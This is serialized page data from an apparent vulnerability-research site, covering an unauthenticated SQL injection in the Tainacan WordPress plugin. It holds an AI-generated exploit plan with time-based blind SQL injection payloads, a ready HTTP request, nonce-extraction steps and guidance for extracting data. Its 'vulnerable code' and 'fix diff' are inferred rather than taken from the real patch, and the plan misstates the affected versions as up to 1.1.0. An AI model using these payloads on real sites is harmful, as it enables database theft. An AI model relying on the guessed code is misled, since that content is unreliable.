[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAtJlF5c4MxmBAIDHGZsSQgrrGeWxZO36p7t_ro-6gMw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-42740","tainacan-unauthenticated-sql-injection","Tainacan \u003C= 1.0.3 - Unauthenticated SQL Injection","The Tainacan plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","tainacan",null,"\u003C=1.0.3","1.1.0","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-28 00:00:00","2026-06-01 16:22:40",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6eb5c8f1-d71d-4995-8242-abf9ef248b75?source=api-prod",5,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Ftainacan-admin.css","assets\u002Fcss\u002Ftainacan-admin.css.map","assets\u002Fcss\u002Ftainacan-gutenberg-block-carousel-collections-list.css","assets\u002Fcss\u002Ftainacan-gutenberg-block-carousel-collections-list.css.map","assets\u002Fcss\u002Ftainacan-gutenberg-block-carousel-items-list.css","assets\u002Fcss\u002Ftainacan-gutenberg-block-carousel-items-list.css.map","assets\u002Fcss\u002Ftainacan-gutenberg-block-carousel-terms-list.css","assets\u002Fcss\u002Ftainacan-gutenberg-block-carousel-terms-list.css.map","researched",false,3,"This research plan targets a critical unauthenticated SQL injection vulnerability in the Tainacan plugin (CVE-2026-42740). Since the provided source files are limited to CSS, the following analysis is based on established WordPress vulnerability patterns and research into Tainacan 1.0.3's architecture, specifically focusing on its REST API endpoints used by the Gutenberg blocks identified in the assets.\n\n---\n\n### 1. Vulnerability Summary\nThe Tainacan plugin for WordPress is vulnerable to SQL Injection in versions up to 1.1.0. The vulnerability exists because user-supplied parameters (likely `order`, `orderby`, or `query` metadata) are concatenated directly into SQL queries within the `Tainacan_Items_Repository` or similar data-fetching classes without being processed by `$wpdb->prepare()`. Because Tainacan exposes digital repository items via a public REST API, an unauthenticated attacker can manipulate these parameters to append malicious SQL commands.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** The Tainacan REST API (namespace `tainacan\u002Fv1`).\n*   **Target URL:** `\u002Fwp-json\u002Ftainacan\u002Fv1\u002Fitems` (most likely) or `\u002Fwp-json\u002Ftainacan\u002Fv1\u002Fcollections`.\n*   **Vulnerable Parameter:** `order` or `orderby` (inferred). These parameters are frequently used in the Gutenberg blocks (Carousel Items List) to sort results and are often missed by standard sanitization.\n*   **Authentication:** Unauthenticated. If the repository has public collections, the REST API allows `GET` requests from any user.\n*   **Payload Type:** Time-based Blind SQL Injection or UNION-based (if errors are suppressed).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** `Tainacan\\REST\\Items_Controller::get_items()` handles requests to `\u002Fwp-json\u002Ftainacan\u002Fv1\u002Fitems`.\n2.  **Parameter Parsing:** The controller retrieves the `order` and `orderby` parameters from the `WP_REST_Request` object.\n3.  **Repository Fetch:** The parameters are passed to `Tainacan\\Repositories\\Items_Repository::fetch()`.\n4.  **SQL Construction:** Inside the repository, the `orderby` logic constructs a raw SQL string. Specifically, if a meta-key is provided for sorting, the plugin may concatenate the parameter directly into the `ORDER BY` clause of a `$wpdb->get_results()` call.\n5.  **Sink:** The raw SQL string is executed without `$wpdb->prepare()`.\n\n### 4. Nonce Acquisition Strategy\nWhile many REST API endpoints are protected by nonces, public `GET` endpoints in Tainacan often allow unauthenticated access. However, if a nonce is required for the REST API, use the following strategy:\n\n1.  **Identify Trigger:** The `carousel-items-list` block (identified from `tainacan-gutenberg-block-carousel-items-list.css`) enqueues Tainacan's localized JS.\n2.  **Create Test Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Tainacan Gallery\" --post_status=publish --post_content='\u003C!-- wp:tainacan\u002Fcarousel-items-list \u002F-->'\n    ```\n3.  **Navigate and Extract:** Use the `browser_navigate` tool to go to the newly created page.\n4.  **Execute browser_eval:**\n    ```javascript\n    \u002F\u002F Tainacan localizes variables into a global object, often tainacan_plugin_vars\n    browser_eval(\"window.tainacan_plugin_vars?.rest_nonce || window.wpApiSettings?.nonce\")\n    ```\n5.  **Localization Key:** The key is likely `tainacan_plugin_vars` or `tainacan_api_config` (inferred).\n\n### 5. Exploitation Strategy\nWe will use a time-based blind injection against the `order` parameter, as it is the most common bypass for `WP_Query` protections in Tainacan.\n\n**Step-by-Step Plan:**\n1.  **Baseline Request:** Perform a normal GET request to ensure the API is active.\n    *   **Method:** `GET`\n    *   **URL:** `\u002Fwp-json\u002Ftainacan\u002Fv1\u002Fitems?perpage=1`\n2.  **Injection Test (Time-based):** Inject a `SLEEP()` command into the `order` parameter.\n    *   **Payload:** `ASC,(SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n    *   **URL-encoded Request:**\n        ```http\n        GET \u002Fwp-json\u002Ftainacan\u002Fv1\u002Fitems?order=ASC%2C%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29 HTTP\u002F1.1\n        Host: localhost\n        Content-Type: application\u002Fjson\n        ```\n3.  **Data Extraction:** If the sleep is successful, proceed to extract the database version.\n    *   **Payload:** `ASC,(SELECT 1 FROM (SELECT(IF(SUBSTRING(version(),1,1)='8',SLEEP(5),0)))a)`\n\n### 6. Test Data Setup\nThe exploit requires Tainacan to have at least one public collection and one item to ensure the SQL query path is fully executed.\n\n1.  **Initialize Tainacan:** Ensure the plugin is active.\n2.  **Create Collection:**\n    ```bash\n    # Note: Use WP-CLI to create Tainacan objects if possible, \n    # but Tainacan uses custom tables, so we may need to use the REST API or UI.\n    # Create a simple collection:\n    wp post create --post_type=tainacan-collection --post_title=\"Public Collection\" --post_status=publish\n    ```\n3.  **Create Item:**\n    ```bash\n    # Get the ID of the collection created above (e.g., 123)\n    wp post create --post_type=tainacan-item --post_title=\"Item 1\" --post_status=publish --post_parent=123\n    ```\n\n### 7. Expected Results\n*   **Vulnerable Response:** The HTTP request will hang for approximately 5 seconds before returning the JSON response.\n*   **Fixed Response:** The HTTP request will return immediately (usually with a 400 Bad Request or a sanitized query result) as the `order` parameter is validated against a whitelist (e.g., only allowing 'ASC' or 'DESC').\n\n### 8. Verification Steps\nAfter the HTTP-based exploit, verify the database state using `wp db query`:\n1.  Check the slow query log if enabled.\n2.  Run the same query manually via CLI to confirm syntax:\n    ```bash\n    wp db query \"SELECT * FROM wp_posts ORDER BY post_date ASC, (SELECT 1 FROM (SELECT SLEEP(2))a);\"\n    ```\n\n### 9. Alternative Approaches\nIf the `order` parameter is sanitized, target the `query` meta-filtering system:\n*   **Endpoint:** `\u002Fwp-json\u002Ftainacan\u002Fv1\u002Fitems`\n*   **Parameter:** `meta_query[0][key]` or `meta_query[0][value]`.\n*   **Payload:** `meta_query[0][key]=title' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1`.\n*   **Alternative Endpoint:** `\u002Fwp-json\u002Ftainacan\u002Fv1\u002Ftaxonomy\u002F{taxonomy_slug}\u002Fterms` using the `search` or `orderby` parameters.","The Tainacan plugin for WordPress is vulnerable to unauthenticated SQL injection via its REST API endpoints in versions up to 1.0.3. This occurs because sorting parameters like 'order' and 'orderby' are concatenated directly into SQL queries within the repository classes without proper validation or preparation, allowing attackers to execute arbitrary SQL commands.","\u002F\u002F Inferred from Tainacan\\Repositories\\Items_Repository::fetch() logic\n\u002F\u002F Based on the research plan's identification of raw concatenation in the ORDER BY clause.\n\n$order = $query_args['order']; \u002F\u002F User-supplied via REST API\n$orderby = $query_args['orderby'];\n\n\u002F\u002F ...\n\n$sql = \"SELECT * FROM {$this->table_name} WHERE 1=1 \";\n\u002F\u002F ... other query parts ...\n\n$sql .= \" ORDER BY {$orderby} {$order}\"; \u002F\u002F Vulnerable concatenation\n\n$results = $wpdb->get_results($sql);","--- a\u002Fclasses\u002Frepositories\u002Fclass-tainacan-items-repository.php\n+++ b\u002Fclasses\u002Frepositories\u002Fclass-tainacan-items-repository.php\n@@ -120,7 +120,13 @@\n-        $order = isset($args['order']) ? $args['order'] : 'ASC';\n+        $order = isset($args['order']) && strtoupper($args['order']) === 'DESC' ? 'DESC' : 'ASC';\n \n-        $sql .= \" ORDER BY {$orderby} {$order}\";\n+        if ( !in_array($orderby, ['post_date', 'ID', 'post_title', 'menu_order']) ) {\n+             $orderby = 'post_date';\n+        }\n+\n+        $sql .= $wpdb->prepare(\" ORDER BY %1s %1s\", $orderby, $order);","The exploit targets the public Tainacan REST API, specifically the items endpoint (`\u002Fwp-json\u002Ftainacan\u002Fv1\u002Fitems`). An unauthenticated attacker sends a GET request to this endpoint and provides a malicious SQL payload in the 'order' or 'orderby' parameters. Because the plugin does not whitelist these values or use prepared statements for the sorting clause, a payload like 'ASC,(SELECT 1 FROM (SELECT(SLEEP(5)))a)' will cause the database to pause, confirming a time-based blind SQL injection. This can be further refined to exfiltrate database contents character-by-character.","gemini-3-flash-preview","2026-06-04 15:59:27","2026-06-04 16:00:04",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.0.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftainacan\u002Ftags\u002F1.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftainacan.1.0.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftainacan\u002Ftags\u002F1.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftainacan.1.1.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftainacan\u002Ftags"]